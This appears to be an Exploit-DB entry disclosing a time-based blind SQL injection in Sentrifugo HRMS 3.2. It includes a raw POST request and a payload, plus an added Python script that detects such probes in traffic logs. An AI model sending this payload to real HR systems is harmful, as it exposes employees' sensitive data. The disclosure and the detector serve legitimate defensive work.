Sentrifugo HRMS 3.2 – ‘id’ SQL Injection

  • Author: minhnb
    Date: 2020-03-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/48179/
  • # Exploit Title: Sentrifugo HRMS 3.2 - 'id' SQL Injection
    # Exploit Author: minhnb
    # Website: 
    # Date: 2020-03-06
    # Google Dork: N/A
    # Vendor: http://www.sapplica.com
    # Software Link: http://www.sentrifugo.com/download
    # Affected Version: 3.2 and possibly before
    # Patched Version: unpatched
    # Category: Web Application
    # Platform: PHP
    # Tested on: Win10x64 & Kali Linux
    # CVE: N/A
     
    # 1. Technical Description:
    # Sentrifugo HRMS version 3.2 and possibly earlier is affected by a blind SQL injection in the deptid
    # parameter, sent via a POST request to the "/sentrifugo/index.php/holidaygroups/add" resource.
    # This allows an application user who lacks the necessary permissions to read sensitive information from
    # the database used by the application.
    
    # 2. Proof Of Concept (PoC):
    
    POST /sentrifugo/index.php/holidaygroups/add HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Referer: http://localhost/sentrifugo/index.php
    Connection: keep-alive
    Cookie: PHPSESSID=j4a2o4mq6frhfltq2a0h2spknh
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 98
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    
    Cancel=1&description=555&groupname=e&id=0'XOR(if(now()=sysdate()%2Csleep(9)%2C0))XOR'Z&submit=Save
    
    
    # 3. Payload:
    
    Parameter: id (POST)
    Type: time-based blind
    Title: MySQL >= 5.0 time-based blind - Parameter replace
    Payload: Cancel=1&description=555&groupname=e&id=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z&submit=Save
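To spot probes of this shape in captured traffic, here is an added Python example (not part of the advisory and not Sentrifugo code) that splits a raw request, URL-decodes the form body, and flags parameters carrying MySQL time-based blind indicators. The sample request is constructed from the PoC above, and the indicator names are this example's own.

```python
"""Flag time-based blind SQL injection probes in form-encoded POST bodies."""
import re
from urllib.parse import parse_qsl

# (indicator name, pattern); names are this example's own, matched case-insensitively.
INDICATORS = [
    ("sleep_call", re.compile(r"\bsleep\s*\(", re.I)),           # MySQL SLEEP()
    ("benchmark_call", re.compile(r"\bbenchmark\s*\(", re.I)),   # MySQL BENCHMARK()
    ("now_eq_sysdate", re.compile(r"now\s*\(\s*\)\s*=\s*sysdate\s*\(\s*\)", re.I)),
    ("xor_splice", re.compile(r"\bxor\b", re.I)),                # XOR used to splice an expression
    ("quote_break", re.compile(r"['\"]")),                        # weak: ordinary text has quotes too
]
STRONG = {"sleep_call", "benchmark_call"}  # each flags a parameter on its own


def split_raw_request(raw: str):
    """Split a captured HTTP request into (request line, body); accepts CRLF or LF."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    return head.split("\n", 1)[0], body.strip()


def indicators_for(value: str) -> list:
    """Names of the indicators present in one decoded parameter value."""
    return [name for name, pat in INDICATORS if pat.search(value)]


def suspicious_params(body: str, min_hits: int = 2) -> dict:
    """Map parameter name -> indicators for values that look like a time-based
    blind SQLi probe. A strong indicator flags alone; weak ones must co-occur
    (min_hits) so the word 'xor' or an apostrophe in free text does not fire."""
    found = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = indicators_for(value)
        if STRONG & set(hits) or len(hits) >= min_hits:
            found[name] = hits
    return found


# Constructed samples: the request shape of the PoC above, and a benign save.
POC_REQUEST = (
    "POST /sentrifugo/index.php/holidaygroups/add HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "Cancel=1&description=555&groupname=e&id=0'XOR(if(now()=sysdate()%2Csleep(9)%2C0))XOR'Z&submit=Save"
)
BENIGN_BODY = "Cancel=1&description=xor+gate+training&groupname=Engineering&id=7&submit=Save"
if __name__ == "__main__":
    line, body = split_raw_request(POC_REQUEST)
    print(line, suspicious_params(body))   # {'id': ['sleep_call', 'now_eq_sysdate', 'xor_splice', 'quote_break']}
    print(suspicious_params(BENIGN_BODY))  # {}
```

The same function can be run over form bodies pulled from a proxy or WAF log; a hit on a numeric field such as id is the strongest signal, since that field should never legitimately contain a quote or a function call.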
    
    # 4. Reference: